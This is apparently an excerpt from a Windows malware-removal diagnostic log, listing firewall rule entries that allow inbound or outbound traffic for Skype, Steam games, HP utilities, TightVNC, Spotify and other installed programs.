"{0421EF0B-1685-43AB-A4CD-1DFCFFFC771A}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{046CB050-90CF-41C3-8B51-141920B1A9AE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{04CAE21D-436F-4671-B1EE-D855D2104FFA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{050BCAD8-A3C3-4BF4-822D-F08D359482BD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0653A980-2F6A-4A9D-9D3A-01FF191DF603}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\america's army\aapg\binaries\aalauncher32.exe | 
"{06D7F5BA-1C34-43B7-A0C7-5C8D84D8A80B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{06DEADE6-7454-406A-9A1C-2736D8E51F07}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{075BCA9C-00B8-45FA-A3D3-12ECE7377514}" = protocol=6 | dir=in | app=c:\nexon\combat arms\nmservice.exe | 
"{08051D15-EB70-45A3-8BE7-2A56406BC983}" = dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartvideo.exe | 
"{09032627-7E33-4313-86C1-965EF89FCAD7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0924DDD9-BE95-4A9C-8D7C-336447611601}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0A2C6903-7A81-41E7-9BD7-1E36F51875AB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0B5DD1B3-FCA4-43AD-A04A-F574D8A5A037}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0BCDA738-4FF5-4D48-8EB7-B800BBD0C5A0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0C6E114E-9EA1-430A-B37E-D4267A290118}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0CBDC055-B3AA-4B78-A33E-142F71310260}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\team fortress 2\hl2.exe | 
"{0CD09142-3572-44B0-83E7-6A46D9251D87}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0CE12F45-EAD8-4344-A81F-B1D3E84B6627}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0CFDB820-5E22-4C70-8EBE-C8CDAE48D1A4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0D319681-9978-4C28-A6B5-F478F254FCC6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0D342EBC-4A29-49F3-9816-232B1E63B225}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0D8A40B7-6490-43BB-A186-5C68B9263715}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0F394A99-BBF3-4E14-96BF-3E35A3A3F60E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0F8AA292-665E-4F85-84C1-8D743F2015E8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0FDE43B4-4F5B-433E-83E6-C65A1102FB67}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{0FFEA23D-B33D-4B14-890C-DEF70B0C0DBB}" = protocol=17 | dir=in | app=c:\programdata\nexonus\ngm\ngm.exe | 
"{10328126-B4B2-4F93-A813-F462885ACF5C}" = protocol=6 | dir=in | app=c:\program files (x86)\tightvnc\vncviewer.exe | 
"{10FD6F6D-FC54-4DAE-93D4-A66D178CC1A6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{110D88AC-A5A0-46E1-8923-05CABCDCA861}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1173501E-2839-422F-9CA1-054316EC55CE}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\arcticcombat\gamelauncher_gp\mappingaccount.exe | 
"{1191F1D8-158E-4ADA-BED3-A4E64B383550}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1197B8D5-83F1-49FB-94B7-2B61BB63B832}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{11F2BD60-2803-4F4D-A670-9EBE8290CBB9}" = protocol=17 | dir=in | app=c:\users\owner\appdata\local\akamai\netsession_win.exe | 
"{122BD7DA-7250-4301-8CE2-762DBE211185}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{12802E68-9CCA-41BE-97C8-F7CB3998F508}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{12C84785-1280-43A9-AA09-B5996A9F9A7A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{136C4A67-F662-45EB-AC2F-4A1C106A7617}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1409F817-6450-4456-A3A4-7050C6AE7EAE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{149A01B0-76F7-422A-B5BA-FD1291D7F7F0}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe | 
"{14A67485-C3AD-4009-A77A-9A5325297816}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1516469B-9A2E-44D2-A4CF-B55AB8A1E8DE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1527DBAA-E059-41A6-8E0F-E4BED96F758D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{152BE409-1ECA-49ED-9BF4-638D57DEE76D}" = protocol=6 | dir=out | svc=mcx2svc | app=%systemroot%\system32\svchost.exe | 
"{15484500-63FF-4BA1-A894-7FBAA4C09F44}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposid01.exe | 
"{1566505B-924F-4E7D-AF4C-9B350ACD9A52}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{15776AFB-C8C9-4287-8BE3-7D622BD6CA21}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\global agenda live\binaries\launcherbin\hirezlauncherui.exe | 
"{15B08E83-239B-44F3-9238-7F5C614B1A63}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{15F0F0B3-7118-407A-8946-D4C3D293948C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{16A6A8F2-FEB6-4B98-B5FF-A9F60C5403A1}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\launcher.exe | 
"{17509F73-B4CA-49B1-A3F6-9DA733B8DF96}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1764EC6A-3B1A-4949-9184-6D81CF1DAB71}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{17875004-A31D-4624-848C-18C417E5D124}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{178DDF2B-FE68-4D1D-8103-C49962ADAA4C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1954DBA6-AEAE-4A26-8B53-D6E73E1EBBA9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{196B0992-A9F2-4D17-8C18-9296EC94DDEA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{19AA061F-3A2F-44B2-8245-1EA72E5D665A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{19CF1622-B883-4948-9898-E90FBEA77D26}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1A3AD69E-7459-4974-9D15-49968C49EC22}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1AFE1CC7-5148-40F6-AA96-66AE964ADA43}" = protocol=6 | dir=in | app=c:\users\owner\appdata\local\akamai\netsession_win.exe | 
"{1B571F5B-7586-481D-B9F8-76C0298E04E2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1C1760BD-A2D0-4015-9361-F9DDEF9E915D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1CA10CA8-A85D-4024-BEB7-9410E1241F5A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1D57A0EA-655E-4240-9718-85F3D17A43D4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1D591F78-8B05-4FFB-AE94-475C53A8C8F6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1DD7477F-9D50-4E17-B895-DDE0E5220AF4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1E749A6E-51FD-477D-9D43-8CFD738944D6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1E7C5CA1-ECF9-48D6-B243-E4B6A898D52A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1EADE42F-6F1D-4D21-AE95-0051760ECB36}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1F1F1647-EF1B-4184-A2EE-54D50468A524}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1FC73977-6555-476E-AF22-866E66F18987}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1FE6949D-3BC9-4C3A-AD12-BC63134A06D1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{1FF53282-E2B3-479D-BD1C-2DC6D5A6603F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2015B380-ECD3-495B-918A-94DFFDCCF74A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{213AAD94-2656-47D6-866C-04B9E923A7D5}" = dir=in | app=c:\program files\tightvnc\tvnserver.exe | 
"{21CB7433-6891-4097-9C76-54C35116AD3C}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqste08.exe | 
"{2207A679-61EE-4370-84D3-062CD582B8D3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{229C0671-77C7-49CE-B784-7FCD27DCBA0E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{237DB21F-75F1-40D0-B36E-F7A1EE50E795}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{23E5E55B-6FF5-48A0-B4DE-ECC12B9B0FB6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{246A6067-C80E-4FFA-8659-D183900114F4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{24873FD3-F1B4-4FE4-8D0F-EA0775EF8B10}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2493AE08-B730-4852-A3B3-98C823EC8A86}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{25305626-CE06-44EC-BF53-5EE5D4FB0DA3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{25B95AA9-A478-4D30-8E08-40BDAFB73DFC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{265701D4-955A-4A7A-9B2C-CC221F870776}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{278237D8-5B45-40B0-BF98-BF79B6555E79}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{279B14CF-FD47-4D1F-BF33-CD116AAC7551}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 | 
"{27BBD180-D3FA-433B-BE73-87A9B6BE9D24}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{280150AC-723C-4C99-B18B-1519D8A7C9C2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{28265DDD-D495-4B9E-AF1E-B8AEA21503A5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{282EA888-946D-41F5-A392-101409F908BF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{28AB3BA9-83A9-4C2C-A957-F81D6BBBAFAE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{28B636EC-C3FC-4927-B473-C4B602505439}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{29035C03-9FED-4D71-8409-C33707356232}" = protocol=6 | dir=out | app=%systemroot%\ehome\ehshell.exe | 
"{29B5B17A-BE43-40A5-B19E-3FA1BCCD7F0E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{29C4B0A8-7068-4C19-9E0D-39D6EF9F798B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2A554653-3B06-42B2-B330-E97C6A9199D3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2B4681DC-D048-41FB-A45D-879FB86D9B84}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2B7F8CEF-376F-45C7-A054-678A311E3BB4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2B877E85-04C9-4E00-8E89-EBCE52F41D20}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2BD19E97-14DA-40E3-AE51-17441E56069F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2BE2617B-2DCC-416A-BEEC-2D9A43B335D8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2CFAC435-463D-4F21-8F45-CFA871E4A4D0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2D54D9C2-8364-4906-9C42-E3D95553AD05}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2DF1959E-55FE-4E3C-BBA3-11702F69F5F7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2E4889C2-5EE0-4721-AAB6-DCFBB6825534}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2EF31E8B-76B2-4ECA-800C-F54F51B0C1E9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2F42F15F-67AD-40BC-8147-37263823B8EB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2F540BFF-4A26-484B-83A9-961819779168}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{2F604D6D-AFBD-44F2-A8BA-7CB1E6BBCA57}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{305543FB-5F4B-46AA-AFC3-8BC90CDA5FEB}" = protocol=6 | dir=in | app=c:\users\owner\appdata\local\google\google talk plugin\googletalkplugin.exe | 
"{30AB3426-C2DD-451D-9B0A-0FC4A1F04139}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{30B56267-A4AF-40C7-9031-6E933B31EFD1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3157B1B6-B828-4CC5-A674-A9146F1D81E7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{319F6CD7-B43C-43A9-9194-8F7DD96448C1}" = dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\kernel\clml\clmlsvc.exe | 
"{320FBF62-4440-4B97-BCDB-64119887B366}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tacticalintervention\bin\tacint.exe | 
"{3292C21E-497F-40BF-8D73-D0754FB00492}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{32D68D0F-5D21-40B7-A002-2DA5124CC8ED}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{32E056AF-6949-4AD4-B634-4A005E7ACC7A}" = protocol=6 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{330E1F99-98FE-4D65-80AC-15CDB59424BA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{336E9067-DD73-483C-98C8-B7DAC4E373C0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{33725E99-23EE-434F-B57D-AEB54770C07C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{33ECC1A9-F453-46E3-8DC8-1DEF1510527F}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{34432590-6B53-47C8-BC45-023670585E6F}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpfccopy.exe | 
"{349D44CE-5AE1-4C27-9D46-004E5946BD13}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{362A617F-7E49-441F-B168-3B42CA710BF8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{363247C5-160A-4335-A927-27E1F7B2E0C7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3667B4CE-29BB-453D-841C-C846FC95C4EA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3687309E-9422-41D7-86EC-3D0E536E53EC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{36AD1CB6-2B7C-41B3-866F-F7751B4A245A}" = protocol=6 | dir=in | app=c:\users\nick\appdata\roaming\dropbox\bin\dropbox.exe | 
"{3760ED5D-B53C-4E3F-94A4-12C319A0E07D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3789A82D-F087-424F-B37F-F524C8F4578D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3970E24E-669A-4823-8B57-BA18FEF05D71}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{39D4BB94-AF15-483B-931F-CAD441135F1A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3A57E62B-2E35-478C-BA47-C8D5A36655F4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3AD8809F-406F-4309-92F8-FB93260AC5CF}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 | 
"{3C09B0B4-EF53-4726-8BCF-1817A0137F1B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3C0A14E6-78A9-4C64-A217-251193680197}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3D387D65-3BE6-4706-8D65-5B0921AE9907}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3D602AD4-C4D3-4141-8CA6-44374940D188}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3D81D4B7-9716-447A-85E0-A0D36848BEE6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3E54CEB6-7105-4BB8-9D2D-76BFD7CEB3FA}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3EE05E48-2A08-456C-BD75-698DF4EB844C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3EE91D04-029D-449A-919A-FC8442925717}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3F039FA8-B86B-4D84-9ED9-548D7C5D4B7C}" = protocol=17 | dir=in | app=c:\users\owner\appdata\roaming\spotify\spotify.exe | 
"{3F4768A6-CE74-40A0-91A9-94EAC8F863B8}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\soldierfront2\binaries\win32\sf2.exe | 
"{3F5A9A15-28D6-4EFC-BFF9-DE87B6F6B449}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3FCE2C25-74D4-415C-8006-F80A438611D5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{3FEF37CB-B5A0-450F-98F0-F8D427DC22DD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4089562A-0215-4AA4-92C2-D72ACAAC1FA2}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4096D12F-5D82-42B0-8B2B-821C8F938833}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4208447D-32FD-4261-9612-0D1E667366CA}" = protocol=6 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{4246EDCB-9103-49AF-AA01-2031A9F9991C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{43059CE3-43D6-4D5E-8CAF-DE43E407B70F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4341F0AB-CEDB-448E-9CEB-0B01FA1AAA82}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgm.exe | 
"{440E6959-5D82-4857-B8A2-5773F279E940}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4473F5FF-412F-4777-98D6-73B2917F3E40}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{449E0252-EC20-49A6-8D5F-B73B2B465247}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{44AC0C95-E875-4C27-8721-36CE8142091F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{44E4CD96-FA00-42EC-B0F9-D7B526CEAEE2}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\soldierfront2\dfubg.exe | 
"{44F7F5D0-C317-4C22-A3A3-6E8807E2B3FF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{45D5B24D-C018-48E2-9C87-C9AC63B6DFE7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{45DEC8ED-4C3D-452B-9C1A-8075E744159E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{465B9C43-3D22-4DF7-B3DB-C9E715CA2AA4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{46AE53C3-FFED-4433-A330-434FBAD88202}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{481FA916-4FD0-4F11-80F0-DD84FFC5ED88}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{494EB2C8-F082-4889-967E-6F92E7FC1DB4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{49733667-69ED-45FE-8DED-10499BA81CD6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{497EF9CA-E647-475A-8103-CF1EE5F8F014}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4A4942E9-925D-4EBE-96EF-106D10AB9F06}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4AB5092E-F717-47D7-9B11-1D4CE8CE2108}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4AC63BFE-65F3-46D0-94A6-1CB1F5344BB8}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\soldierfront2\binaries\win32\sf2.exe | 
"{4AE953D6-E45B-4845-8FA0-6FD6714EC014}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{4B0AF54A-8285-4DA9-B600-C52E2D37A640}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4B4820A9-4EBF-4A39-9B93-9BC9CB55AFB7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4CCA1EC2-E792-46A5-B50E-4F409152871D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4D61E04D-B225-47DB-B7EE-780B9D22D994}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4D8B200B-EC55-4A1E-BC00-76515A9F0080}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4F074A25-60CE-4F75-8A3F-731B1C151A29}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4F0FF0B0-81D7-4991-B138-B17576D20C0C}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{4FD04A83-647D-4358-BE0B-89C968FA77C1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{501E4325-C6D3-460C-AF52-409A204EACCC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5108793F-4463-46A1-9E4A-26DC51300DB6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5143E947-0ED7-42E8-B4BF-95F066FAB7AE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{51752C61-D895-4AF9-AC9B-C1CFA558DAD3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{51C10C31-1116-41DB-99A3-F90EF50F2B2E}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{51DB623B-C2CE-4DD2-936F-4A97569BB9D4}" = protocol=6 | dir=in | app=c:\program files (x86)\codemeter\runtime\bin\codemeter.exe | 
"{51DD80DF-D3F0-4EF4-8A4A-28593056F92A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{52243172-D8F0-434B-B885-FCD40502CC22}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{52B014FF-E72E-400A-AEB5-035C955F429B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{536A0D5D-D13D-4627-8E41-992DD0DD3914}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{53794343-FC33-43D0-AEED-6874BF307E27}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{53F985B3-7DB6-40A7-BA46-F65FE721968E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5479CFFA-DCF8-49DC-B79B-25A92CE4B71E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{56B88D3A-4AFD-4ABA-8692-664303ABD308}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{56DC62CE-DF8A-4246-887F-F41F64BF559D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5870EF7D-2AA1-4E26-A52F-0E79BCDBD0AB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{58B450F3-3157-4CE6-BDC1-33B2FCD523A4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{58DFC8A4-9445-42E0-A3E2-3169E20ADDBD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5901602B-700C-4D0B-A315-19A6EA10F268}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{59199D8B-BAD3-4835-8104-7A3A0EEE6E63}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{596F3F5F-3888-46CF-8D88-77A28AA7235D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{59B88A73-8B14-419C-8148-B030EC7F24CF}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5A55580D-246E-4D64-97F6-809932230CCB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5A757556-867F-498E-9FAB-0DBE537448A7}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\tom clancy's ghost recon online\launcher.exe | 
"{5A831179-858B-4B1A-8C1A-134583B74F12}" = protocol=6 | dir=in | app=c:\users\nick\appdata\roaming\spotify\spotify.exe | 
"{5B03B419-048B-4643-B6DA-C2DB8B3C709C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5B06B05F-59A0-4D0A-8AFB-824892097EE9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5B66F3F3-73CB-4E64-9183-20DEAB0B6FC4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5B7D085C-D267-4F54-95F2-EF3BCED363A6}" = protocol=6 | dir=out | app=%systemroot%\ehome\mcx2prov.exe | 
"{5BA35BC0-F52D-4CDF-84A7-B0455B71F405}" = protocol=6 | dir=out | app=%systemroot%\ehome\mcrmgr.exe | 
"{5BC12604-20F4-4B8B-B8A6-35804E946E3E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5C2D61B5-9FD1-4039-BAB0-B36E06C49FAE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5E43BAFD-2F84-4A0B-BE60-3454D053402D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5E4A7E51-F925-4573-B252-4DC78913A476}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5E91FB5D-4F00-461D-8F67-9F3EC09758AE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{5EDF5316-CDDD-4CCA-BD30-193A5B2C4229}" = protocol=6 | dir=out | app=%systemroot%\ehome\mcrmgr.exe | 
"{5EE8BE79-6A90-427C-86EF-4818017F5DCC}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpiscnapp.exe | 
"{60009A40-9179-475D-8343-F39B99D7F1FE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{60A4D7F5-02D8-48D1-91E9-AC9A625382DB}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\ava\nwzlauncher.exe | 
"{60D9E5CD-E338-48AD-85BB-4BD3DB4B8A5A}" = protocol=17 | dir=in | app=c:\users\owner\appdata\roaming\utorrent\utorrent.exe | 
"{60F9B099-87B8-4CA9-A2DF-065DBEE8910C}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqkygrp.exe | 
"{6113809C-9271-44DB-B814-56F9496CA23F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{61196BBF-5736-4F1D-80C2-A58D73591735}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{61888ED1-35A3-463B-B3C4-7BBC2D07F1C4}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{61CBD5F0-C6DE-438E-B170-9EF80E31DD37}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{61D3E280-368F-4D30-B0C6-26E79BA2B777}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{62081FC4-E0DA-43CE-8C90-C6FB15FA244E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{62D5A79B-2896-4D2B-AFC3-34E66262D0D6}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe | 
